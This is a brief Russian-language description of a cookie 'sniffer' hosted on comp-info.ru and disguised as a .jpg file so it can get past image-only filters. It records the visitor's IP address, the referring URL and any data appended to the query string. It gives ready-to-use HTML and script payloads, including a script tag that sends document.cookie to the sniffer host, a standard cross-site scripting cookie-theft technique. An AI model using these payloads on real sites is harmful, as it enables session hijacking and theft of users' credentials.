Сниффер позволяет узнать такие параметры как IP-адрес, полный URL странички, с которой он был вызван и произвольную информацию, переданную снифферу через
запрос.
Сниффер возвращает браузеру
jpg картинку. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок.
Передача параметров снифферу осуществляется через строку, расположенную после знака ?. Например:
http://comp-info.ru/pic/image.jpg?здесь_мои_данные
Примеры использования сниффера:
Простой вызов по ссылке: <a href="http://comp-info.ru/pic/image.jpg?it is test">click me</a>
Вызов как картинки: <img src="http://comp-info.ru/pic/image.jpg">
Вызов из скрипта: <script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script>